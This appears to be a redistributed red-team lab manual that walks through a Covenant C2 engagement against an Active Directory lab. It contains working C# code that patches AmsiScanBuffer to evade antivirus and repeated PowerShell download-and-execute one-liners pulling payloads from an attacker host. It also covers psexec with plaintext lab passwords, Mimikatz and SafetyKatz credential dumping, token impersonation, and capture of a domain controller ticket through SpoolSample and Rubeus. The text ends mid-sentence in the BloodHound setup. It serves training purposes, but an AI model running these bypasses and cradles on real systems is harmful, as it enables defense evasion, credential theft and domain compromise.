You can now try to trigger an AMSI signature by

typing into a PS window "AmsiScanBuffer" as one
string and also separately. Can you see the
difference?

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

This means that it might be possible to bypass

AMSI by obfuscation (one of many possible ways of
bypassing AMSI). If you try to execute Covenant's
payload, you will be blocked by AMSI:

If you go to Virus & Threat protection, you will

be able to see what types of threats have been
identified. We can see that the word
"AmsiScanBuffer" was detected as something that
looks like "AMSI Tampering" and a Covenant
launcher is properly identified.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's try to utilize obfuscation in order to

bypass AMSI on the machine and execute Covenant
launcher.

We can use a publicly available tool named

AmsiScanBufferBypass from rasta-mouse. It can be
found on the github repository below.

https://github.com/rasta-mouse/AmsiScanBufferBypa
ss

Let's download the repository content. If you try

to utilize the .ps1 bypass script immediately it
will probably be detected.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

At the time of creating this course the C# AMSI

bypass version is also detected.

Let's repurpose the C# Version with the same

example found in page 55 from the Evasion module.
The code used will be the following:

using System;

using System.Runtime.InteropServices;

// Andres Doreste, ASB Bypass mod without using

GetProcAddress

public class Amsi

static byte[] patch = new byte[] { 0xB8,

0x57, 0x00, 0x07, 0x80, 0xC3 };

public static void Bypass()

try

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

// Returns amsi.dll address

var lib =
Win32.LoadLibrary("amsi.dll");

// Locate ASB Function by amsi.dll

address + 0x2540 (9536)

IntPtr ASBPtr = new

IntPtr(lib.ToInt64() + 9536);

// Change memory protection to

PAGE_READWRITE

uint oldProtect;

Win32.VirtualProtect(ASBPtr,
(UIntPtr)patch.Length, 0x04, out oldProtect);

// Apply the patch

Marshal.Copy(patch, 0, ASBPtr,
patch.Length);

// Change memory protection to

PAGE_EXECUTE_READ

Win32.VirtualProtect(ASBPtr,
(UIntPtr)patch.Length, 0x20, out oldProtect);

catch (Exception e)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Console.WriteLine(" [x] {0}",

e.Message);

Console.WriteLine(" [x] {0}",

e.InnerException);

class Win32

[DllImport("kernel32")]

public static extern IntPtr

LoadLibrary(string name);

[DllImport("kernel32")]

public static extern bool

VirtualProtect(IntPtr lpAddress, UIntPtr dwSize,
uint flNewProtect, out uint lpflOldProtect);

This can be compiled in Visual Studio.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Or via the following command in your Kali Box if

the mono-complete package is installed:

mcs Program.cs -sdk:4 -target:library

-out:ASBBypass.dll

Let's transfer that dll to the attacking machine.

We renamed it for convenience to simply a.dll and
started a python http server in that directory.

Then, we downloaded and loaded it using .NET

reflection from PowerShell:

curl http://10.100.10.2:7777/a.dll -outfile a.dll

[System.Reflection.Assembly]::LoadFile("c:\users\
adminels\a.dll")

[Amsi]::Bypass()

Now we are able to "hook" the machine using the

Covenant stager without getting detected.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Note that the bypass has been performed using a

Medium integrity PS process.

Reconnaissance after compromise

Next steps to take are related to post
exploitation activities. Before we start, it is
necessary to figure out what actions can be made
without alerting any monitoring or EDR solutions
which for sure will be present in an attacked
organization.

One of the post-exploitation modules included in

Covenant that is related to situational awareness
is Seatbelt.

SeatBelt.exe is a multi-feature commandline tool

that focuses on gathering various information
about the underlying OS. The full documentation
is available online here.

It can be invoked with the "full" argument which

will cause the tool to perform all the checks it
is capable of doing, while you can force just
specific tests when passing the checks names as
subsequent arguments (Case sensitive!), e.g.

SeatBelt.exe CredFiles, Patches

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As the tool is built-in, you don't have to

manually transfer it to victim machine. Once your
grunt is active, you need to go to Tasks and
choose the proper command. In this case we will
invoke all the checks:

This task can also be executed on win10-web.

Below you can see part of the output from the
module.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Note that there are no specific lab objectives

to be obtained during that action.

Privilege escalation with Covenant

Another task that you might want to conduct
during a red team engagement is privilege
escalation. Note, that in this task you already
have admin access, so this is not necessary to
progress in our lab.

Let us remind you in that point that escalating

privileges is a noisy activity and can lead to
detection. However, the advantages of achieving
administrative/system privileges are obvious -
you can for example plunder the machine for
clear-text passwords or use it as a fully
controlled pivot point to another network.
Performing privilege escalation is only advised
when there are reasons to do so. Again - a red

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

team engagement is not a CTF and you will not get

additional points for escalating your privileges.

Using Covenant you will be able to transfer

privilege escalation-assisting software to the
remote machine, such as:

● SharpUp https://github.com/GhostPack/SharpUp

● PowerUp
https://github.com/PowerShellMafia/PowerSploi
t/blob/dev/Privesc/PowerUp.ps1

Moreover, there are tools like exploit suggesters

that will allow you to enumerate missing patches
(along with suggested exploits). You might also
want to use Sherlock & Watson
https://github.com/rasta-mouse/Sherlock,
https://github.com/rasta-mouse/Watson

In order to run Watson on the remote machine, you

need to transfer it yourself. Let's first start
by downloading it from github:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Open the .sln in Visual Studio and compile it as

Release / Any CPU. After compilation, move
Watson.exe to your attacker machine.

Go to Grunts - Tasks and choose "Assembly". Then,

pick the Watson.exe and proceed with the task:

Exploring privilege escalation vectors is also

possible through SharpUp. In contrary to Watson,
SharpUp is already built-in into Covenant.
SharpUp is also available as a standalone tool.

To use it from within Covenant, simply go to

"Grunts" -> "Task" and choose SharpUp. After a
short while you should be able to see results of
your action in the "Taskings" section:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In that case, we have already took over an

administrative user. However, due to User Account
Control we first need to elevate our process'
integrity before we can have a real impact on
underlying system.

Elevation from administrator to System

During post-exploitation activities you might
want to elevate from an Administrative, High
integrity context to SYSTEM. This might allow you
to accomplish more on the target machine. Let's
first start with the ProcessList Task and choose
a service running as SYSTEM. We can observe a

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

vmware related daemon which might be a good

target.

Next step will be to use task

"ImpersonateProcess" specifying the above process
ID as an argument. We can see that Covenant
successfully executed the task. Let's execute
WhoAmI again to see if it worked:

Indeed, now we are running as SYSTEM integrity.

We can now spawn another grunt by entering the

"interact" tab and executing

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell iex (new-object

net.webclient).downloadstring('http://10.100.10.2
/1.ps1')

Soon, we will receive a separate SYSTEM grunt

We can always return back to the original context

by using "RevertToSelf" command.

Compromising Jumpbox
In order to compromise Jumpbox, administrative
credentials of a local administrator are given.
Feel free to use any tool that abuses them to
gain initial access. For example, we use
PsEXEC.py from impacket with the credentials of
Administrator user:

/root/impacket/examples/psexec.py
Administrator:Summer2020\!@10.100.10.250

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, create a Covenant launcher and execute it on

Jumpbox:

We are starting with a listener on the tap0

interface's IP address:

Create a binary launcher this time and download

it to your system.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Then, rename it to launcher.exe and move it to a

directory which will be exposed using a
webserver.

As already discussed, you can also create the

grunt using a PS oneliner once in the psexec
terminal:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell iex (new-object

net.webclient).downloadstring('http://10.100.10.2
/1.ps1')

A new grunt should be spawned.

Extending foothold on Jumpbox

Similarly to WIN10-WEB, you can find e.g. using
nmap that RDP is enabled on Jumpbox. Try to
create another grunt by logging in. This is an
additional grunt that we can utilize for further
tasks related to analyst1. Imagine that this
grunt with analyst1 privileges is obtained after
successful phishing is performed. The credentials
to use are: ELS-CHILD\analyst1 and
a1@3L$-CHILDL0c@l

For better stability, we use native windows RDP

client (feel free to use any kali client like
rdesktop if you want).

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to do that, enable socat on Kali

socat tcp-l:65520,fork tcp:10.100.10.250:65520

and then use mstsc.exe from a windows machine

with target [Kali IP]:65520

As already mentioned, we will use the credentials

of a simple domain user (analyst1) to establish
yet another Covenant grunt (that has domain user
privileges). This grunt will be handy in order to
experience starting with low privileges on the
domain.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

iex (new-object
net.webclient).downloadstring(‘http://10.100.10.2
/1.ps1’)

The grunt we created will be later used in

various scenarios that include analyst1 user as
a starting point.

If we execute the command "net localgroup

Administrators" it will show us who is a member
of the local administrators group.

It looks like domain user victim is administrator

also on that workstation. As we are already on
RDP, we can spawn another grunt through new
PowerShell window which is "Run as Administrator"
and ELS-CHILD\victim credentials are typed there.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

iex (new-object
net.webclient).downloadstring('http://10.100.10.2
/1.ps1')

A new high integrity grunt is spawned.

Dumping credentials with Covenant

As a high integrity process, we can now run other
elevated-only tasks, for example dumping LsaCache
through the Task below.

Also the task Mimikatz with a command of

"sekurlsa::logonpassword" gives interesting
results: Domain administrator credentials.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The "WDigest" task gives similar results.

It was possible to obtain domain administrator

credentials. Equipped with them, you can execute
any task described in this scenario as non-local.

Dumping credentials with safetykatz

We can also try a Task named SafetyKatz. The
standalone version of that project is available
on GitHub
(https://github.com/GhostPack/SafetyKatz) and as
the creators describe it, it is a "combination of
slightly modified version of @gentilkiwi's
Mimikatz project and @subtee's .NET PE Loader."
It is also built it into Covenant, so we can

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

simply invoke it through a Task named

"SafetyKatz" and wait a bit for the results:

Note down the credentials of the privileged

domain user from this exercise -
ELS-CHILD\Administrator (pass:
Admin@3L$-CHILDL0c@l*****)

The password is also automatically stored in the

Data tab of Covenant:

Impersonating users with Covenant

If there is no RDP access, or just to try an
alternate way of using domain credentials, you
can use the impersonate utility of Covenant.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Once you have access to a workstation, you can

use the credentials of the domain user analyst1
in order to impersonate a low privileged user.
Moreover, any domain user can be impersonated
this way. Analyst1's credentials can be found
below.

analyst1 : a1@3L$-CHILDL0c@l

In order to impersonate analyst1, we will need

first to create his token. Go to the grunt and
choose the "MakeToken" task:

Then run it and go to the "interact" tab

Check your identity with whoami:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, prepare your PowerShell launcher. Go to

Launchers -> PowerShell -> Click "generate". Then
"host". You must have done this already during
the previous tasks. If not, choose filename and
click Host. We chose 1.ps1 for our payload.

powershell -Sta -Nop -Window Hidden -Command "iex

(New-Object
Net.WebClient).DownloadString('http://10.100.10.2
/1.ps1')"

we shorten it to:

powershell iex (New-Object

Net.WebClient).DownloadString('http://10.100.10.2
/1.ps1')

Now, you can use the newly created analyst1

grunt. This scenario might be helpful when

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

compromising the Jumpbox machine. Even though you

have SYSTEM access, you would still want to
interact with the domain, so you can use this
technique along with the given or any other
gathered credentials. However, you might need to
elevate your permissions using an UAC bypass.

DOMAIN ATTACKS
Starting point
At this point, if you followed along the
exercises, you have obtained following
credentials:

ELS-CHILD\Analyst1, who is an unprivileged domain

user

ELS-CHILD\victim, who is a local administrator

and a domain user

ELS-CHILD\Administrator who is the Domain

Administrator

● Note, that you are free to use RDP for

debugging purposes anytime you want.

● Whenever you need a medium integrity grunt

you can do again the exercise with Analyst1

● For High integrity grunt, use the victim

grunt. Domain admin will also work, but you

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

might miss the ability to showcase real

impact (since he has domain-wide access
already).

● For domain persistence and cross-domain tasks

use a Domain administrator grunt with high
integrity. As you already know the
credentials, you can achieve it in the same
way you obtained victim grunt.

Domain Reconnaissance
For domain reconnaissance you can use PowerView,
which can be downloaded from its GitHub page:

https://raw.githubusercontent.com/PowerShellMafia
/PowerSploit/master/Recon/PowerView.ps1

Save it in a file on your attacker machine. We

have it at /tmp/PowerView.ps1. Now go to the
Grunt which is member of a domain and run a
PowerShellImport Task, as follows

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You should be able to see confirmation of the

import when successful in the Taskings tab:

You can also upload PowerView (risking detection)

and try to import it using Import-Module

Next, go to the same Grunt on which you imported

PowerView and open the "Interact" Tab.

PowerView utilizes, among others, RSAT (Remote

Server Administration Tools) which is an optional
feature installed on Windows environments.
Unfortunately, by default it is not installed.
You can recognize its presence by simply trying
to issue e.g. Get-Domain cmdlet.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Lack of output or error means that your PowerView

features will be limited on that workstation.

In our case, we don't have RSAT Enabled. Cmdlets

of interest might be the following.

Remember to work in an elevated context (High

integrity)

● Find-LocalAdminAccess helps you to figure out

where local admin can enter

● Get-NetLoggedOn (e.g. Get-NetLoggedOn

-ComputerName uatserver)

● Get-NetSession (e.g. Get-NetSession

-ComputerName uatserver)

● Invoke-Sharefinder (Medium integrity)

Reconnaissance conducted that way might be

helpful when you are looking for a limited amount

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

of information. For big volumes of AD information

it is better to use BloodHound.

Domain reconnaissance II
Our starting point for the second reconnaissance
exercise will be a grunt originating from the
jumpbox workstation with a medium integrity
process and a domain user named Analyst1

You will need to import PowerView, which has

already been presented. As PowerView is imported,
we can enumerating. Listing users is possible
with:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Powershell Get-NetUser

We can select only accountnames by piping the

output to "select samaccountname"

powershell Get-NetUser | select samaccountname

Enumerating computers in the domain can be done

using the below command

Powershell Get-NetComputer

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's try to explore some Active Directory

groups. For example Domain admins:

powershell Get-NetGroup -GroupName "Domain

Admins" -FullData

Following down that path, you can extract members

of the domain administrator group:

powershell Get-NetGroupMember -GroupName "Domain

Admins" -FullData

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can also try to find accessible network shares

powershell Invoke-ShareFinder -ExcludeStandard

-ExcludePrint -ExcludeIPC -Verbose

Both of them are network logon shares.

powershell Get-NetGPOGroup -Verbose

We can also list Organizational Units using

powershell Get-NetOU

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

...and domain policies using powershell

Get-NetGPO

Rubeus inside Covenant

Now we will continue leveraging the AD
infrastructure of this lab to practice various
attacks against Active Directory using Covenant.

When starting your Covenant listener make sure

that the connect-back address of the launchers is
the same as your tap0 IP address and if that the
port is exposed through Docker (if you are
running Covenant from Docker)

Create a high integrity grunt using a Powershell

Launcher from the Jumpbox machine. Now, let's try
with the first task - Rubeus.

Rubeus, is also available on its GitHub page

https://github.com/GhostPack/Rubeus as a

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

standalone tool, however, we can conveniently use

it within Covenant.

Let's go to Tasks and issue the following

command:

Then you should be able to see the results in

Taskings:

Exploiting Unconstrained Delegation

Let's now try to exploit Unconstrained Delegation
using Covenant and Rubeus.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We have hooked a machine that allows for

unconstrained delegation. Its hostname is
win10-web.

Our session is a high integrity one.

First, let's also gather some prerequisites. For

exploiting unconstrained delegation, you will
need to trigger the so-called "printer bug",
which can be triggered using a PoC available on
GitHub:

https://github.com/leechristensen/SpoolSample

SpoolSample can be easily compiled using Visual

Studio as Release x64. We will transfer the
result file SpoolSample.exe to the Kali machine.

We will also need to transfer it later to the

victim machine. You can do it in any preferred
way, e.g.

● Upload using Covenant task

● Use raw powershell and python simple http

server (powershell curl
http://10.100.10.2:9999/SpoolSample.exe
-outfile spo.exe)

Currently we have a high integrity grunt on

win10-web.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will try to exploit unconstrained delegation

against child-dc01

We will also need Rubeus

(https://github.com/GhostPack/Rubeus).

First, let's check in Interact if we have

successfully transferred SpoolSample.exe

We also compile Rubeus

(https://github.com/GhostPack/Rubeus) with .NET
version 3.5. Let's also transfer Rubeus.exe to
the remote workstation

powershell curl
http://10.100.10.2:9999/rubeus.exe -outfile
c:\users\Administrator.ELS-CHILD\rubeus.exe

We can now start it:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell .\rubeus.exe monitor /interval:5 >>

r.log

Let's note down the PID, we will need it for

later:

powershell Get-Process -name Rubeus

Now let's run the Spooler Bug PoC:

powershell .\spo.exe child-dc01 win10-web

You might encounter issues related to fact that

Rubeus is still running, like below one:

You might need to end Rubeus PID forcefully due

to locking the log file.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now you should be able to download r.log. As you

see some base64-encoded data on the screen, go to
Data tab and download the file:

If you did everything correctly, you will have a

ticket dumped in your log file!

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Using that ticket, it is possible to impersonate

the domain controller machine account. Copy the
base64 blob and go to grunt and Tasks. You might
want to remove spaces and newlines, so before
using the ticket we saved it in a file and piped
to the tr command, as follows.

cat ticket | tr -d "\n" | tr -d " "

Issue task Rubeus with argument ptt

/ticket:[Base64]

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

You should be able to see the output:

You can now use another Rubeus task or go to

"Interact" tab to use "rubeus klist"

Under Client Name you can see the owner, which in

that case is "CHILD-DC01$" machine account.

Setting up Bloodhound

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to set up BloodHound we will use a local

Windows 10 VM. First, install Neo4j Community
Server
(https://neo4j.com/download-center/#community).
Neo4j depends on Java
(https://www.java.com/en/download/).

Unpack the downloaded archive and start the

neo4j.bat file. It is recommended to run it from
an elevated command prompt, otherwise you will
not be able to see any errors messages.

Despite having Java installed, if you got the

below error message...

... you may need to change your JAVA_HOME

environment variable to your jre11+ directory
like in below picture.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

If everything goes well, you should see something

similar to the below screenshot in your console:

Now, go to http://127.0.0.1:7474 in your browser

to display the neo4j console.

Default credentials are neo4j:neo4j and you will

be asked to change them after first login.

Now, let's download Bloodhound. Go to

https://github.com/BloodHoundAD/BloodHound/releas
es

and download the latest one.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We used the x64 version:

Unpack the archive and start BloodHound.exe. You

will be asked for credentials for the neo4j
database you've just set up.

So far there's an empty screen since we didn't

feed any data to Bloodhound. Let's go back to the
Covenant agent to collect some information from
the Grunt.

Let's go to
https://github.com/BloodHoundAD/SharpHound3 and
download SharpHound.

We will use the precompiled release that can be

downloaded here:

https://github.com/BloodHoundAD/BloodHound/tree/m
aster/Ingestors

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://github.com/BloodHoundAD/BloodHound/blob/m
aster/Ingestors/SharpHound.exe

If you would like to build it from source, let us

give you several hints on errors you might
encounter:

● First, you as you unpack the archive and try

to Build the solution, you might encounter
several errors related to NuGet. If this
happens, right click on the solution and
choose Manage NuGet packages. Then in the top
right corner of screen, click "Restore".

Another error you might encounter is "Please use

